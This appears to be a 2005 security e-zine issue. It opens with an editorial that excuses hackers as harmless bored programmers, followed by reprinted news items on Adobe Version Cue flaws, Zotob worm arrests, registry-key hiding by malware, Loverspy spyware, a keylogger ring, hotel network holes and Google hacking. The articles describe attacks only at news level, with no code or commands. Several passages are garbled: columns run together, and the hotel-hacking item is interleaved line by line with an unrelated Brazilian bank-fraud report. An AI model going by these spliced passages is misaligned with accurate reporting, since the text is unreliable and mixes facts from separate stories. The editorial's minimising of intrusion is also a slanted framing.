Computer crime had scared most of us, human-beings.

This crime is usually associated

with the term "Hacker". Well, my friend let me tell u this: the real "Hackers" aren't "thieves"
or “criminals”, but some young people with great intellectual capacity that could help
building a more secure Internet. They could be useful to your company, business or
security. Just give them a chance and you'll see.

The term "Hacker" for many means a person that steals user information, money, breaks
software, create viruses or invade your privacy. Well, my friend, this is wrong. A Hacker is
Ccucu, really a very good programmer with high brain capacity and you shouldn't confuse them
Chief Editor with Crackers or Carders. The problem is that a Hacker is always misunderstood. His
actions are generally un-offending or harmless. Maybe he's just bored...

But, we shouldn't forget that the best Internet "terrorists" are highly trained programmers.
The reasons why they do this could be various: from simply trying to prove that they are
‘better than others’ to the ‘will to do something new’ or ‘just spend their time in others way
than usual’. But the worst is when a Hacker motivates his actions by the lack of chance he
gets from society or the lack of money. And here comes the new aspect: it all starts with
some little mean action, and, very soon (and this is because they always know what they
are doing) become more confident in their actions and take advantage of rich or naive
people and this is when the transformation takes part: the Hacker becomes a “Cracker” or
a “Carder”.

A good example is that of Romanian Hacker, Calin Mateias. Calin Mateias was indicted by
a US court for conspiring to steal $10m of computer equipment from Ingram Micro. It
seems that the Romanian "Hacker" operates under the name Dr Mengele; he hacked into
the computer company’s systems and placed over 2000 fraudulent orders for goods before
he was caught. He also had several contact people in the US who helped Calin Mateias to
sell the equipment he ordered. His accomplice was also charged at the hearing in L.A., if
convicted Mateias could face up to 15 years in prison. Calin was once a great Hacker. He
crossed the line and paid for his actions hard and strong. And so, the world lost a great
Hacker and a very promising programmer. And this is only a little example. Most crimes
aren't brought in the light because it is a small one or the company might feel ashamed.
Most of Internet "terrorists" steal between $100-400. They pay for their crimes as everyone
else does, but they aren't seen by the large public. But somehow when big companies or
governmental organizations hear about them they try to get them to work for them, to use
their knowledge and stop others that make the same mistakes they did before. They
rehabilitate them so that they can lead their lives in a respectful way. Ex: In the movie ‘Bad
Boys’ the police (Will Smith & Martin Lawrence) get a hacker out of jail and as him to hack
into a ex-cop’s files to solve a case, and later in the sequel ‘Bad Boys II’ you can see the
same hacker working in the police force, and helping them.

Real Hackers aren't just a few. They are in fact a very well organized community and there
are even Hacker’s trials. The best will win the money that others hope to steal and also win
what everybody wants: RESPECT. Also, there are even sites that put up challenges to
Hackers: for example decrypt some code by another Hacker and if their good they can put
up a challenge of their own. If jogging is a hobby to someone, same is here. But a large
community pushes it to extreme and hacking becomes a drug, a good but dangerous job.
Many know that real hackers work for big companies or NASA or other government facility
or organization and you won't see them making jail.

But if this phenomenon isn't controlled and we don't give these high-gifted youngsters real
opportunities, we shouldn't be wondering how young John from your street is on the TV as
a "big star”, as a Carder or one of the most wanted Crackers that crawl over the Internet.

Ccu
Digitally signed by
Ccucu He'll be like Osama Bin-Laden of the World Wide Web. So encourage them, use their
DN: cn=Ccucu, c=US, knowledge for your protection, or say like a great person once said “Hack me, baby!”
o=Ccucu, ou=Ccucu's
WareZ, email=forumc.
tk@gmail.com

cu Reason: I am the
author of this document
Date: 2005.10.07
20:39:07 +03'00'
Flaws revealed in Adobe Version Cue
Company has issued a patch for vulnerabilities
Two new security vulnerabilities were revealed this
week in Adobe Systems' Version Cue software, the
second and third security flaws discovered in the
company's software in less than two weeks, according
to security consulting firm iDefense.
Both flaws allow local attackers to gain root privileges
to a machine through Version Cue, the file-version
manager in Adobe's Creative Suite software,
according to Michael Sutton, director of iDefense
Labs at iDefense, a VeriSign Inc. company.
One flaw is a "library loading vulnerability" that
enables potential hackers to load a custom library by
executing a method from the command line of
VCNative, a root application in Version Cue, said
Rich Johnson, a senior security engineer with
iDefense Labs. In this way, someone could take full
control of a system and gain root privileges, thus
enabling them to introduce malicious code.
The other way someone could gain root privileges
through Version Cue is to exploit the log file created
when the root application VCNative begins running,
he said. The log file is always called the same thing,
and if a person "knows what it's called they could put
a file in there that would allow redirection of that file
to a location of choice, then can override special
system files with this," Johnson said.
Though published reports claimed that the flaws affect
the most recent version of the suite, Creative Suite 2,
an Adobe spokesman said in an interview Tuesday
that this is not the case. The flaws only affect the
previous Creative Suite release, which came out in
August 2003, said Bob Schaffel, senior product
manager of Version Cue for Adobe.
Adobe already has issued a patch for both
vulnerabilities, which can be downloaded at
http://www.adobe.com/support/security/main.html#vc
uemac, he said.
The Threat
Source:
from Within
The flaws were discovered by an individual
who only wanted to be identified by his online
code name, "vade79," and were submitted to
iDefense through its Vulnerability Contributor
Program, Sutton said.
Sutton said the flaws are "far from the sexiest
vulnerabilities we’ve ever seen" since they can
only be exploited by local attackers, meaning
they already must have access to the machine
to exploit the flaws. Also, the flaws only affect
versions of Creative Suite for Apple OS X, so
there is a "limited user base" that is affected, he
said.
Still, the vulnerability risk is made more
significant by the fact that the flaws are
relatively easy to exploit once a user has access
to a machine, and there is already exploit code
that could be used to take advantage of the
vulnerabilities that has been released publicly,
Sutton said. Though he does not know where
the code originated, it can be found on the Web
site of the French Security Incident Response
Team, www.frsirt.com, Sutton said.
With the discovery of the Version Cue
vulnerabilities, there have now been three flaws
discovered in Adobe's software in less than two
weeks. On Aug. 16, Adobe issued its own
security advisory on a buffer overflow
discovered in Adobe Acrobat and Adobe
Reader. The company immediately issued a
product update to patch the flaw.
The recent spate of vulnerabilities are not
indicative of a lack of overall security in
Adobe's software platform, but instead are the
inevitable result of developing a broad portfolio
of software, Schaffel said.
"I don’t think this should be seen as some kind
of internal trend," he said. "When you consider
the broad number of products and the
enormous amount of code [we develop], every
now and then something like this manages to
slip through."
The Threat from Windows Worm
Within Variants Emerge,
Even the best virus protection and network security
won't shield your company from a virus if one of your Attack
employees downloads it intentionally. While any
company can be the target of internal sabotage, a recent
survey of security and HR execs by risk management
consultancy Risk Control Strategies shows that
companies with between 500 and 900 employees are the
most at risk: twenty-three percent of those companies
have been victimized by internal sabotage through virus
downloads in the past two years.

On Wednesday, four new variants of the ZoTob worm

had been detected by F-Secure in Finland, bringing the
total to 11, said Mikko Hypponen, the company's
manager of anti-virus research. He said the variations
apparently had been programmed to compete with each
other -- one worm will remove another from an infected
computer.

Several new variants of a computer worm emerged

Wednesday to attack corporate networks running the
Windows 2000 operating system, just a week after
But even if you pull a Trump and fire troublesome
Microsoft Corp. warned of the security flaw.
employees, the threat won't go away. According to a
recent study by the U.S. Secret Service and CERT,
As experts predicted, the Windows hole proved a
which analyzed 49 cases of insider computer sabotage,
tempting target for rogue programmers, who quickly
most incidents were carried out via remote access, and
developed more effective variants on a worm that
less than half of the saboteurs had authorized access at
surfaced over the weekend and by Tuesday had snarled
the time of the incident. The report concludes: "The
computers at several large companies.
power of a terminated employee with system
administrator access should not be underestimated."

Source: Malware may hide

behind long names in
Windows registry
Security experts have found a vulnerability in the Windows
operating system that could allow malware to lurk
undetected in long string names of the Windows Registry.
Hidden-code flaw in Windows renews
worries over stealthly malware
A flaw in the way that several security programs and systems utilities detect system
changes could allow spyware to spread surreptitiously and have renewed worries about
stealthier attack code.
Last week, the Internet Storm Center, a group of security
professionals that track threats on the Net, flagged a flaw in
how a common Microsoft Windows utility and several anti-
spyware utilities detect system changes made by malicious
software. By using long names for registry keys, spyware
programs could, in a simple way, hide from such utilities yet
still force the system to run the malicious program every
time the compromised computer starts up.
Already, some spyware authors seem to be playing with the
rudimentary technique to try and hide their programs, said
Tom Liston, a handler for the Internet Storm Center and a
network security consultant for Intelguardians.
"We have seen indications that someone is trying this
technique out," Liston said. "Basically, we have seen code
that is stuffing a key in the registry with a huge length. Yet,
the author still doesn't have it working."
A Microsoft representative said that the company is
investigating the report, but does not consider the problem an
operating system flaw.
"Our early analysis indicates that this attempt to bypass these
features is not a software security vulnerability, but a
function within the operating system that could be misused,"
the company said in a statement. "Microsoft is reviewing the
report to determine further details and whether there is any
potential impact for customers and will provide appropriate
customer guidance if necessary."
The potential threat comes as more malicious software has
started to use various techniques to attempt to escape
detection. Some attackers have merely used targeted Trojan
horses and customized spyware to evade defensive software.
Such techniques are believed to be the reason that a
sustained attack on U.S. and U.K. government agencies and
industry has largely gone unnoticed.
The creators of more advanced rootkits--software
designed to stealthily and completely compromise a
system--are starting to add memory hiding to their bag
of tricks, said Greg Hoglund, CEO of software analysis
firm HBGary and author of the recently published
ROOTKITS: Subverting the Windows Kernel. Hoglund
discussed the technique at the Black Hat Security
Briefings and DEF CON hacker convention in July.
"Spyware is the biggest problem right now, and the
people that are writing it are starting to get a clue, and
that's a scary trend," Hoglund said.
The potential for hiding the execution of programs using
overly long registry keys, on the other hand, is much
smaller, because Microsoft and affected security
software vendors will likely fix the affected utilities
soon, he said.
"None of the people that I know who are writing rootkits
would not use this method to hide the key," he said.
The technique involves using a registry key whose name
is longer than 256 bytes. The Windows Registry holds
important system data, including what programs to run
at startup. The long key and any of its subkeys are not
seen by the affected utilities, but can be read by the
system just fine. By using the technique, a malicious
program could run every time a computer is started, but
keep its execution a secret from the utilities, the Internet
Storm Center said.
Programs that apparently cannot detect malicious
software using the registry technique include AdAware,
Microsoft's Anti-spyware Beta, Norton SystemWorks
2003 Pro, Registry Explorer and WinDoctor, according
to an ISC posting. The Internet Storm Center could not
create a definitive list, because the programs apparently
acted differently on non-English versions of Windows.
Symantec, the creator of the Norton brand of system
utilities, is the owner of SecurityFocus.
The technique works against Microsoft's RegEdit utility,
but other system utilities, such as Reg.exe and the
Microsoft Configuration Editor, are not affected, the
software giant stated.

The developers of the affected programs are already
working on fixes for their products. If Microsoft fixes
the RegEdit issue, it may also solve the issue for other
vendors, ISC's Liston said.
"It should be something that Microsoft should be able
to address in the next monthly update," he said.
"There are a lot of programs out there that do things
like look at the registry that are affected by this."
While the technique may only be useful for a limited
time, spyware authors will likely incorporate it into
their programs, said Joe Stewart, senior researcher for
security firm Lurhq. Another major threat, bot
software, will likely not use the technique, he said.
"Spyware usually does a much better job of hiding
itself in the registry than bot software," Stewart said.
"Even though bots are often used for spyware, adware
or other financially motivated activity, they are
programmed as if they were just general-purpose
utilities--for some reason they almost always go with
the tried-and-true 'Run' registry key."
System integrity checkers and security software
should attempt to detect more surreptitious techniques
like registry hiding, added HBGary's Hoglund.
Hoglund and two other researchers have modified a
common rootkit using techniques, ironically, taken
from a way of protecting against buffer overflows, a
common software flaw. The memory cloaking allows
a rootkit to run its own code while hiding that code
from detection by the operating system.
Such techniques will likely become common in
malicious software in the near future, he said.
Hoglund stressed that security software makers have
to start thinking more like attackers and adding more
advanced detection capabilities to their products.
"If your security tools aren't also using rootkit-like
techniques, then they can be subverted easier," he
said.
Source:
'Loverspy' Spyware
Creator Indicted, On
the Run
Allegedly violated U.S. computer privacy laws,
Feds say.
The creator of Loverspy, software to surreptitiously
observe individuals' online activities, has been indicted
for allegedly violating U.S. federal computer privacy
laws.
If convicted, Carlos Enrique Perez-Melara, could face a
maximum sentence of 175 years in prison and fines of
up to $8.75 million. His current whereabouts are
unknown.
Four individuals who purchased Loverspy to illegally
spy on others were also indicted.
"This federal indictment--one of the first in the country
to target a manufacturer of "spyware" computer
software--is particularly important because of the
damage done to people's privacy by these insidious
programs," John Richter, acting assistant attorney
general of the U.S. Department of Justice's Criminal
Division, said in a statement. "Law enforcement must
continue to take action against the manufacturers of
these programs to protect unsuspecting victims and seek
punishment for those responsible for wreaking havoc
online."
Perez-Melara, 25, was indicted last month on 35 counts
of manufacturing, sending, and advertising a
surreptitious interception device (the Loverspy
program), unlawfully intercepting electronic
communications, disclosing unlawfully intercepted
electronic communications, and obtaining unauthorized
access to protected computers for financial gain. Each
count carries a maximum penalty of five years in prison
and a maximum fine of $250,000.
His indictment was returned on July 21 by a federal
grand jury sitting in the U.S. District Court for the
Southern District of California in San Diego, but the
indictment was unsealed only Friday.
Secret Monitoring
Perez-Melara advertised and sold Loverspy and
EmailPI software over the Internet for $89 a copy to
people looking to secretly monitor an individual's e-
mail, passwords, chat sessions, and instant messages,
as well as the Web sites they visit. Purchasers of the
program could log into a Loverspy Members Area on
the Loverspy and EmailPI Web sites and choose an e-
card and greeting that would be sent to the victim.
Loverspy would arrive hidden inside the e-card and
would launch when the victim opened the card. After
being installed, Loverspy would send regular reports
collating the victim's online activities either directly to
the purchaser of the spy software via e-mail or to
Perez-Melara, who would then forward the reports to
the purchaser. The spyware also enabled the purchaser
to remotely control the victim's computer to the extent
of altering and deleting files, and surreptitiously
turning on any Web camera hooked up to the victim's
computer.
From around July 1, 2003, until October 10, 2003,
approximately 1000 individuals in the United States
and abroad bought Loverspy and sent e-cards
containing the application to around 2000 people,
according to the authorities. Around half of those
2000 are known to have had their computers
compromised and their communications intercepted,
the indictment stated. The antivirus software of the
day didn't identify Loverspy as dangerous, so it didn't
block the program's installation, the indictment noted.
Perez-Melara's operations were shut down after the
FBI executed a federal search warrant for his San
Diego apartment on October 10, 2003.
The victims named in the indictment are located in
California, Hawaii, Missouri, New Hampshire, North
Carolina, Pennsylvania, and Texas.
Others Indicted
The four other individuals indicted with Perez-Melara
by the federal grand jury in San Diego are John
Gannitto of Laguna Beach, California; Kevin Powell
of Long Beach, California; Laura Selway of Irvine,
California; and Cheryl Ann Young of Ashland,
Pennsylvania. They are each charged with two counts-
-unauthorized access to protected computers (via
Loverspy) in furtherance of other criminal offenses
and illegally intercepting the electronic
communications of their victims. Each of the two
counts carries a maximum penalty of five years in
prison and a maximum fine of $250,000.
Other purchasers of Loverspy have been prosecuted
by federal authorities in Charlotte, North Carolina,
Dallas, and Honolulu. Prosecutions are going ahead in
Kansas City, Missouri, and Houston. All known
Loverspy victims have been notified by e-mail that
they were targeted by the program, according to the
authorities.
Zotob Arrest Breaks
Credit Card Fraud
Ring
Turkish officials have identified 16 more
suspects this week in a continuing crackdown
on illegal online activity that stems from the
arrest of two men in connection with the Zotob
Internet worm.
The 16 individuals are believed to be connected to a
credit card theft and identity theft ring, but not directly
involved with the creation or dissemination of Zotob,
according to Paul Bresson, an FBI spokesperson.
The action followed the arrest of Atilla Ekici, 21, in
Adana, Turkey on Aug. 26 in connection with the recent
Zotob Internet worm and with Mytob, another wide-
spreading worm that first appeared in February.
Little information was available on the arrests Tuesday,
which was a holiday in Turkey. Officials contacted by
eWEEK at the U.S. Consulate in Adana and at the U.S.
Embassy in Ankara said they had no information on the
additional arrests.
However, links between Ekici, who used the online
handle "Coder," and co-conspirator Farid Essebar, an
18-year-old resident of Morocco who was known online
as "Diabl0," would not be surprising, security experts
said.
Both men are believed to have controlled large networks
of compromised computers, or "botnets," according to
Joe Stewart, a senior security researcher at managed
security provider LURHQ Corp.
Bot networks are frequently used to harvest information
or intellectual property from compromised machines, as
well as for distributing spam, advertising and viruses.
Microsoft Corp. and the FBI were cooperating in an
investigation of botnets before Zotob was released, said
Tim Cranton, a senior attorney at Microsoft and director
of the company's Internet Safety Enforcement team.
Cranton declined to comment on whether Microsoft's
investigators were on to Diabl0 before Zotob, but said
the company had "developed a lot of intelligence" about
the botnets Diabl0 operated prior to Essebar's arrest and
that the information "helped inform" the actions of law
enforcement.
The 16 new suspects may be operating their own botnets
using variants of Zotob or the earlier Mytob worms,
which Essebar is believed to have created.
According to Stewart, each member of the group would
probably be given a copy of the source code by Essebar
and would compile it into a unique Mytob or Zotob
variant, with its own IRC (Internet Relay Chat) server
and channel details, then release the variant on the
Internet and build a botnet out of hosts the worm
compromises.
"There would be no reason for them not to have their
own botnets," he said. In fact, a sizeable botnet is almost
a requirement for those who move in the Internet
underground, where the slightest online provocation can
invoke a denial-of-service attack from another botnet
operator.
While the other suspects in the case may be acquainted
with Diabl0 and Coder, Stewart said it's wrong to think
of the botnet operators as a tightly coordinated group.
"It's really just individuals and small groups of botnet
owners who get together," he said.
While Diabl0 and Coder were not the largest botnet
operators, they were very successful and their creations
generated a lot of "noise" on the Internet, he said. Virus
researchers at Sophos PLC's SophosLabs said that
Diabl0 is believed to be behind about 20 other virus
variants, including Mydoom-BG and versions of the
Mytob worm.
Together, the variants accounted for six of the top 10
viruses and more than 54 percent of all viruses reported
to Sophos in August, the company said.
"It will good to see them go," Stewart said.
Source:
Is Malware Hiding
in Your Windows
Registry?
Security company says vulnerability could
allow malicious software to lurk undetected.
Security experts have found a vulnerability in the
Windows operating system that could allow malware
to lurk undetected in long string names of the
Windows Registry.
According to a security advisory by Denmark-based
IT security company Secunia, the weakness is caused
by an error in the Windows Registry Editor Utility's
handling of long string names. A malicious program
could hide itself in a registry key by creating a string
with a long name, which would allow the malicious
string and any created after it in the same key to
remain hidden, according to Secunia. Keys are stored
in the Windows Registry, which saves a PC's
configuration settings.
Secunia has confirmed that the vulnerability affects
the "Run" registry key, according to the advisory.
Malicious strings in this key will be executed when a
user logs in to the PC.
Affected Systems
The vulnerability affects Windows XP and Windows
2000 and has been confirmed to exist on fully updated
XP systems with Service Pack 2 and Windows 2000
systems with Service Pack 4, according to Secunia.
Microsoft issued a statement on the vulnerability
saying it is investigating the weakness and is not
aware of any malicious attacks that have exploited it.
Moreover, the company asserted that the vulnerability
by itself could not allow an attacker to remotely or
locally attack a user's computer. It could only be
exploited if the computer had its security
compromised in some other way or was already
running malicious software.
In its advisory, Secunia provided several solutions to
avoid exploitation of the vulnerability, one of which is
to ensure that systems have up-to-date anti-virus and
spyware detection software installed.
The security company also said it is possible to see the
hidden registry strings with the "reg" command-line
utility of the Windows Registry, and that the
"regedt32.exe" utility on Windows 2000 is not
affected by the weakness.

U.S. Agencies Take
Security Into Their Own
Hands
Chief information security officers at federal agencies are more
concerned about the quality of the software they buy than they
were a year ago, and they are beginning to integrate security
functions directly into their daily operations rather than relying
on outside help, according to a study released today.
The study, based on a survey conducted by Intelligent
Decisions Inc., found that these and other changes in CISO
outlook reflect a growing maturity of the role of IT security
within the government. After many years of struggling to
implement a basic security framework, government agencies
are turning to more complex issues.
"They've got the systems administration component of security
down," said Roy Stephen, cyber security director at Intelligent
Decisions, in Ashburn, Va. "Before, people thought you could
just put a firewall at the edge of the network. [Now] you need
intru-sion detection mechanisms on each machine."
Last year, CISOs typically sought training and installation with
the purchase of new technology, but increasingly they are
showing confidence that their own systems administrators can
handle deployment and management. In a similar vein, the
survey revealed that security operations are being rolled back
into network operation centers rather than being approached as
separate functions.
"People are not as interested in getting specialized cyber
security help. They're more interested in having it built into
their daily functions," Stephen said,
The survey also showed that federal CISOs are spending
considerably more time on compliance with the 2002 Federal
Information Security Management Act than they have in the
past, which came as a surprise to the study's authors. CISOs
spend an average of 3.75 hours a day on compliance activities,
compared to 3.06 hours one year ago.
"We had hoped that FISMA would get easier and more
automated as time went on," Stephen said. "The CISO is
spending more time on it himself or herself. It just shows how
big a concern it is."
Among the greatest concerns in
government IT shops is the vulnerability of
wireless networks and mobile devices, the
survey found. CISOs remain worried about
unauthorized wireless access points,
unauthorized wireless deployments and
rogue WiFi devices.
"We know that every agency has wireless
somewhere, whether they admit it or not,"
Stephan said.
Although wireless is prevalent throughout
the government, fewer than half of the
organizations surveyed had adopted
security controls recommended by the
National Institute of Standards and
Technology. The recommendations include
comprehensive policies, security tool
configuration requirements, monitoring
programs and policy training. Next month
NIST is expected to float new wireless
security guidelines, which will evolve into
new mandates.
Symantec, CipherTrust load
up security appliances
Much like most enterprise-class IT tasks, security
can become weaker when a company network is
bogged down with too many devices.
Management borders on the impossible and IT
can never quite get as clear a picture of its own
security as it needs.
Three indicted in U.S. spam
crackdown
Three people accused of sending massive
amounts of spam face possible prison sentences
after being indicted by a grand jury in the U.S.
state of Arizona and accused of violating the
CAN-SPAM Act of 2003 and other charges, the
U.S. Department of Justice said in a statement.
Use Ad-Aware to Cover
Your Tracks
You probably know that Lavasoft's Ad-Aware program sniffs out
adware on your system, but did you know that the free utility can
also erase your browser's search and Address histories, eliminate
Word's list of recently opened documents, and clear the record of
files played in Windows Media Player? These privacy protectors,
and many others, are available every time you complete an Ad-
Aware scan.
After you download and install the program, choose the second
button from the top-right corner to open the integrated
WebUpdate tool, and ensure that you have the most recent list of
adware definitions. With your new definitions in place, click the
Scan now button on the left, choose Perform smart system scan,
and click Next. When the scan finishes, click Next again to see
the scan results.
The entries listed under the Critical Objects tab are files that Ad-
Aware has identified as potential threats to your privacy. Use the
program's Knowledge Base and Threat Assessment Chart to
determine whether to delete the files: Click Help, Contents,
double-click Support, and choose either entry to view more
information. (Note that many of the "threats" may be relatively
harmless tracking cookies that you might find useful when you
return to the sites that left them. For example, a cookie left by a
shopping site may display items similar to those you've recently
purchased on the site.) Check the files you want to delete, and
choose Quarantine.
Now click the Negligible Objects tab to see the 'Most Recently
Used' files list. The list tracks the documents you've opened lately
in such applications as Adobe Reader and Microsoft Office, the
terms you've entered in your browser's search and Address fields,
and your file-download history, among other activities. Check the
items you'd like to erase, click Quarantine, give the file a name
(such as old history), and click OK twice. Choose Next and
OK once more to view the scan results.
NIST launches new
vulnerability
database
The National Institute of Standards and Technology
has launched a new vulnerability database to help
security professionals learn about and correct
vulnerabilities.
The database, known as the National Vulnerability
Database (NVD), integrates all publicly available U.S.
government resources on vulnerabilities and provides
links to industry resources, according to NIST. It is
built on a dictionary of standardized vulnerability
names and descriptions called common vulnerabilities
and exposures.
About 300 new vulnerabilities are discovered each
month, according to NIST.
Updated daily, the NVD contains information on
almost 12,000 vulnerabilities. It allows users to search
by a variety of characteristics, including software
name and version number; vendor name; and
vulnerability type, severity and impact, the agency
said. The database can also be used to research the
vulnerability history of a product and view
vulnerability statistics and trends.
The NVD was developed by researchers in the NIST's
Computer Security Division in conjunction with the
Department of Homeland Security's National Cyber
Security Division.
Identity Theft Is Out of Control
More than 7 million people are victims
of identity theft each year—or nearly
20,000 thefts a day—according to
Gartner Research and Harris
Interactive. Many thefts occur because
of casual mistakes in the offline world:
handing a credit card to the wrong
person or scribbling your Social
Security number on a sheet of paper someone can
find. But many more are facilitated by the Internet,
which still has a long way to go when it comes to
protecting our privacy.
Identity pirates can gather all sorts of confidential
information about you by prowling the Web. With a
little more ingenuity, they can hack into your online
accounts—mining credit card numbers, addresses, and
telephone numbers. And if you let your guard down,
they can use underhanded techniques like phishing
and pharming to fool you into giving them
information. Social engineers con many people into
giving out sensitive data simply by asking for it.
Think you've taken the necessary precautions? Think
again. Virgil Griffith, a researcher at Indiana
University, recently found a hole in the system that
affects us all. Most Web sites provide a way to access
password-protected accounts when you've forgotten
your password. When you sign up for an account, the
site typically asks you to fill in the answer to a
common question, such as "What's your mother's
maiden name?" or "What street did you grow up on?"
If you forget your password, the site grants you access
when you answer this question.
Unfortunately, by trolling free public records in
Texas, Griffith proved that anyone could track down
mothers' maiden names for more than a quarter of the
state's population.
White hats—corporate security experts—look closely
at such holes. Researchers at RSA Security, for
instance, are considering ways of improving so-called
knowledge-based authentication. They're developing a
technology, code-named Nightingale, that lets sites
verify answers to authentication questions without
actually storing those answers on their servers.
"Two servers or even two different Web sites can
work together to verify information like this, but
without either one of them knowing enough to
answer or find out the answers themselves," says
Dr. Burt Kaliski, chief scientist for RSA Labs. Even
if someone hacks the servers, they can't access your
information.
Others are working to provide stronger
authentication via hardware devices. Charles
Palmer, head of security and privacy at IBM
Research, believes many online privacy woes can
be solved by leveraging a security chip like the
Trusted Platform Module, an IBM-developed
device now championed by several industry players.
This kind of chip encrypts files and passwords,
making them readable only on your computer.
A4Vision's facial recognition software is one way to
authenticate identity.
Of course, you must also make sure that no one else
can log on to your PC. That's where biometric
authentication comes in. Fingerprint readers capable
of verifying your identity are already available for
desktops and laptops. Companies like Compaq,
DigitalPersona, Ethentica, Identix, and Sony offer
devices that attach via USB cable, and several IBM
laptops actually come with integrated readers. Other
companies, including such names as Iridian
Technologies and Visage, are offering retinal
scanning and facial-recognition tools.
A4Vision's facial-recognition technology can even
verify your identity continually. Projecting a light
through a filter, the system creates a virtual grid
roughly four feet in width. As you step into this
grid, it distorts to follow the topology of your face.
A camera then measures the distance to your face at
each point within the grid. These measurements are
unique, and when you step in front of the camera
once again, the system is able to identify you.
"We've used it in highly secure areas where
companies want to know who is behind a
workstation at all times," says CEO Grant Evans.
"Our system can observe the person and give
positive identification 14 or 15 times a second."

You could even use biometrics to verify your
identity with a third party. The trouble is that when
you use traditional biometrics, there's always the
danger that someone will hack into a machine
where your fingerprint, retinal, or facial information
is stored. Recognizing this problem, researchers at
the Stevens Institute of Technology, Johns Hopkins
University, Carnegie Mellon, and Florida State are
working on a biometrics system that can operate
without storing your physical data.
The system would use your typing or voice patterns
to store a code across two different tables of
information. "Simply by typing on your keyboard,
you could unlock the code," says Susanne Wetzel, a
Stevens Institute researcher, "but to an attacker, the
tables would look like random pieces of
information."
This only begins to describe the vast arsenal of
authentication and privacy projects under way at
universities and in corporate research labs. In the
years to come, identity theft will present a much
tougher challenge to would-be thieves.
Source:
ID theft automated using
keylogger Trojan
Anti-spyware researchers have uncovered a massive
identity theft ring linked to keylogging software. The
malware was discovered by Patrick Jordan of Sunbelt
Software while doing research on the infamous
CoolWebSearch application but the key logger itself is
not CWS. It's far nastier.
During the course of infecting a machine, Jordan
discovered that the machine became a spam zombie that
was also sending data back to a remote server. He found
that thousands of infected machines are contacting a US-
based server daily and a portion of these are writing to a
keylogger file, which is periodically harvested by
cybercriminals. "The types of data in this file are pretty
sickening to watch. You have search terms, social
security numbers, credit cards, logins and passwords,
etc," Sunbelt president Alex Eckelberry writes.
Sunbelt has contacted some of the affected individuals
to warn them their personal details had been exposed. It
has also informed the FBI. It remains unclear if the
keylogger is directly related to CWS or not. Sunbelt
advises consumers to use a personal firewall to prevent
the key logger from "phoning home".
The use of key logging software on an industrial scale is
rare but not unprecedented. Malware can be
programmed to send back sensitive information to
designated servers, in some cases logging into the
servers using passwords written into viral code. Security
researchers able to reverse engineer items of malware
can extract this password and location information and
use it to monitor hacker activity.
Source:
Hotel hacking could pump smut into
every room
Hotel hybrid broadband internet and TV-on-demand entertainment systems are open to attack, security
researchers warn. Penetration testing firm SecureTest has identified a number of vulnerabilities in the
implementation of hotel broadband systems delivered using Cisco's LRE (long-reach Ethernet) technology.
Using a laptop connected to a hotel network, SecureTest found it was possible to control the TV streams
sent to each room or gain access to other user’s laptops.

The security holes uncovered call to mind the security

exploits in hotel infra-red controls recently uncovered
by Adam Laurie, technical director at secure hosting
outfit The Bunker. Ken Munro, managing director of
SecureTest, said that its research covered security
weaknesses in IP (as opposed to infra-red) systems.
During a stay in a hotel belonging to an unnamed
worldwide chain, a SecureTest staffer paid for internet
connectivity. He found TCP port 5001 open on the in-
Brazil cuffs 85 in
room IP enabled TV providing the service. Connecting
to this port a full TV maintenance menu was displayed
online bank hack
over which it was possible to carry out test procedures,
change channels or turn the TV on and off.

dragnet
According to SecureTest, a hacker might be able to
access this menu and configure the system to display
adult content on every TV channel. The port could also
be used to broadcast content directly from a laptop over
the TV. In theory, this could enable hackers to download
and broadcast any material throughout the hotel
complex.
Another vulnerability revolved around insecure network
configuration. There appeared to be no segregation
between client devices, creating a means for a user to
access other devices connected to the same hotel
network. The system scrutinised used a Cisco 575 LRE
box, which allows existing CAT2 (telephone) cabling to
carry on-demand services avoiding the need to roll out
CAT5 (twisted pair) cabling to each room.
The security risk lies not in terms of this technology but
in how it was implemented, problems SecureTest has
seen replicated at other hotels. During a previous
investigation, SecureTest used a different fixed
internet/TV hotel system implemented by another hotel
chain and located a connection to an internal FTP server.
This provided open access to information such as a
backup database of TV usage.
"A hacker or disgruntled employee could get their kicks
byy accessing and manipulating the TV menu, but this
er implications.
breach has much widBrazilian federalAn individual
police last week cuffed 85
own advertising
could broadcast their people across sevenor an activist
states their of hacking
suspected
e to every
own political messagonline bankroom," saidand
accounts SecureTest's
netting $33m,
Munro. "Moreover, fixed internet
Reuters access is inadequately
reports.
protected in many cases.
The People
arrests plug
were into a hotel
the culmination of a four-
network assuming it’smonth
a trusted connectioncodenamed
investigation, but it’s not."Operation
Unless they have a personal
Pegasus", firewall
whichrunning,
generatedfraudsters
105 arrest warrants.
can snoop on desktops A at leisure.
total of 410Hotels andtook
officers suppliers
part inofthe swoop.
guest entertainment systems need to act now to prevent
these scenarios."
Is Google Exposing You to Hack Attacks?
Hackers use search engine to find unsecured sites, networks, routers, and Webcams.
Somewhere out on the Internet, an Electric Bong may be
in danger. The threat: a well-crafted Google query that
could allow a hacker to use Google's massive database
as a resource for intrusion.
"Electric Bong" was one of a number of household
devices that security researcher Johnny Long came
across when he found an unprotected Web interface to
someone's household electrical network. To the right of
each item were two control buttons, one labeled "on,"
the other, "off."
Searching for Holes
Long, a researcher with Computer Sciences Corporation
and author of the book Google Hacking for Penetration
Testers, was able to find the Electric Bong simply
because Google contains a lot of information that wasn't
intended to lie exposed on the Web. The problem, he
said at the Black Hat USA conference in Las Vegas last
week, lies not with Google itself but with the fact that
users often do not realize what Google's powerful search
engine has been able to dig up.
In addition to power systems, Long and other
researchers were able to find unsecured Web interfaces
that gave them control over a wide variety of devices,
including printer networks, PBX (private branch
exchange) enterprise phone systems, routers, Web
cameras, and of course, Web sites themselves. All can
be uncovered using Google, Long said.
But the effectiveness of Google as a hacking tool does
not end there. It can also be used as a kind of proxy
service for hackers, Long said.
Getting In Via Google
Although security software can identify when
an attacker is performing reconnaissance work
on a company's network, attackers can find
network topology information on Google
instead of snooping for it on the network
they're studying, he said. This makes it harder
for the network's administrators to block the
attacker. "The target does not see us crawling
their sites and getting information," he said.
Often, this kind of information comes in the
form of apparently nonsensical information--
something that Long calls "Google Turds." For
example, because there is no such thing as a
Web site with the URL "nasa," a Google search
for the query "site:nasa" should turn up zero
results. Instead, it turns up what appears to be a
list of servers, offering an insight into the
structure of the U.S. National Aeronautics and
Space Administration's internal network, Long
said.
Combining well-structured Google queries with
text processing tools can yield things like SQL
passwords and even SQL error information.
This could then be used to structure what is
known as a SQL injection attack, which can be
used to run unauthorized commands on a SQL
database. "This is where it becomes Google
hacking," he said. "You can do a SQL
injection, or you can do a Google query and
find the same thing."
Although Google traditionally has not
concerned itself with the security implications
of its massive data store, the fact that it has
